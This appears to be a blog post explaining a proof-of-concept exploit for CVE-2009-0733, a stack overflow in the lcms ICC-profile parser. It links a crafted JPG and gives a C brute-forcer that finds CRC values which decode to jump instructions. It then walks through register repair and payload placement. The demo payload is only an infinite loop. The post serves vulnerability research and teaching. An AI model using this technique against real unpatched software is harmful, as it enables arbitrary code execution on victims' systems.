Here's the sample JPG file with embedded evil ICC profile: http://cevans-app.appspot.com/static/CVE-2009-0733.jpg
I'm only bothering to write about this because the story behind the exploit contains a few interesting twists which illustrate the iterative constraint solving used in modern exploits:
- The underlying code flaw is a stack-based buffer overflow. But the data going past the bounds is not arbitrarily user-controlled. (If it were, a traditional stack smashing exploit would work, but the ASLR could affect the reliability of the exploit). Here's the faulty code in cmsio1.c, where
nCurves
can end up greater thanMAXCHANNELS
:
static
LCMSBOOL ReadSetOfCurves(LPLCMSICCPROFILE Icc, size_t Offset, LPLUT NewLUT, int nLocation)
{
LPGAMMATABLE Curves[MAXCHANNELS];
...
for (i=0; i < nCurves; i++) {
Curves[i] = ReadCurve(Icc);
... - The data going past bounds is actually pointers to heap chunks (returned by
ReadCurve
). This is nice because it takes ASLR out of the equation. We'll automatically overwrite%eip
with a pointer to a valid heap address. But what is in that heap chunk? If it were arbitrary user controlled data, we'd have game over already, but unfortunately it is not. We're looking at pointers to this structure:
struct GAMMATABLE {
unsigned int Crc32;
int Type;
double Params[10];
int nEntries;
WORD GammaTable[1];
} - There are two types of constructs in the input ICC profile used as a basis to populate this structure:
curv
andpara
.curv
is of little use to us because it mostly leavesCrc32
set to0
(or set based only on 16 bits of input entropy). Trying to execute the code0x00 0x00
is a crash because it dereferences the%eax
register:add %al,(%eax)
, and the value of this register is left as0
or1
to denote success of failure when theReadSetOfCurves
function exits. - This leaves us looking at a
para
curve, which calculatesCrc32
based very indirectly on some input variables under our control. Although we can't reverse it, we can brute force it with a little program:
#include "lcms.h"
static
void AdjustEndianess32(LPBYTE pByte)
{
BYTE temp1;
BYTE temp2;
temp1 = *pByte++;
temp2 = *pByte++;
*(pByte-1) = *pByte;
*pByte++ = temp2;
*(pByte-3) = *pByte;
*pByte = temp1;
}
static
double Convert15Fixed16(icS15Fixed16Number fix32)
{
double floater, sign, mid, hack;
int Whole, FracPart;
AdjustEndianess32((LPBYTE) &fix32);
sign = (fix32 < 0 ? -1 : 1);
fix32 = abs(fix32);
Whole = LOWORD(fix32 >> 16);
FracPart = LOWORD(fix32 & 0x0000ffffL);
hack = 65536.0;
mid = (double) FracPart / hack;
floater = (double) Whole + mid;
return sign * floater;
}
int
main(int argc, const char* argv[]) {
unsigned int crc;
unsigned char* p_crc;
double params[10];
int type = 0;
unsigned int i;
unsigned int start = atoi(argv[1]);
for (i = start; i <= 0xffffffff; ++i) {
if ((i % 10000) == 0) {
printf("progress: %u\n", i);
}
params[0] = Convert15Fixed16(i);
LPGAMMATABLE table = cmsBuildParametricGamma(4096, type + 1, params);
crc = table->Seed.Crc32;
p_crc = &crc;
if ((p_crc[0] == 0x93 || p_crc[0] == 0x95 || p_crc[0] == 0x97) &&
p_crc[1] == 0xff &&
p_crc[2] == 0xe6) {
printf("got it!!!!!!! %u %u\n", i, p_crc[0]);
return 0;
}
free(table);
}
return 1;
} - What does this program do? Let's see:
chris@chris-desktop:~/progs$ ./a.out 3221970952
got it!!!!!!! 3221970952 151
This is telling us that apara
curve of type0
whose 4 input bytes are3221970952 == 0xC00B6008
will result in0x97 0xff 0xe6 0x??
being written toCrc32
. We don't care about the last byte. This assembles toxchg %eax,%edi jmp %esi
which will execute because%eip
jumps to thispara
heap chunk, which starts with the CRC. It is urgent to do something in 4 bytes or less because we have terrible control over the rest of the content of this heap chunk. What these 3 bytes do is to overwrite%eax
with%edi
then jump to%esi
. The significance here is that both registers we used were under our control because they were also restored from the stack we trashed with pointers to valid heap chunks. - So execution continues at the curve heap chunk pointed to by
%esi
. We arrange for this to be acurv
type chunk. Earlier we dismissed them as useless because the0 Crc32
will result in a dereference of%eax
. But now, thanks to ourpara
chunk, we've repaired%eax
to point to a valid heap chunk! Unlikepara
chunks,curv
chunks do contain arbitrary data we can supply, after a mostly-zero header. We've essentially used the control at the beginning of apara
chunk to repair%eax
and use the vast control at the end of acurv
chunk. Before our arbitrary code executes, a bunch of now harmless0x00 0x00
will execute, writing some junk at the start of one of our unused heap chunks. Finally, just before our arbitrary code, the value ofnEntries
in the header will be executed. This value is0x02 0x00 0x00 0x00
which isadd (%eax),%al add %al,(%eax)
. This trashes%eax
a little bit before dereferencing it again, but only up to 256 bytes, so we're good and we could always use a different number of entries in ourcurv
chunk. Certainly, a real payload would need more than 2 words. - The actual arbitrary code that executes is
0xeb 0xfe
which is equivalent tofor (;;);
in C. Look out for an endian reversed instance of those two bytes, as well as an endian reversed0xC00B6008
in the exploit file. - There's one further twist in the exploit relating to stack alignment. Some compilation optimization leaves no space between the end of the
Curves
array and the start of the saved registers. Other cases have a 4-byte gap. The exploit caters for both these stack layouts by careful layout ofcurv
vs.para
chunks. Here's a simple illustrative table:
As can be seen,Curve in input file Hit if 0 gap Hit if 4 bytes gap 17: blank curv ebp 4-byte gap 18: curv payload esi ebp 19: curv payload edi esi 20: blank curv ebx edi 21: para redirect payload eip ebx 22: para redirect payload eip + 4 eip %eip
always gets thepara
payload and%esi
always gets the real payload.
Muy Bueno!
ReplyDelete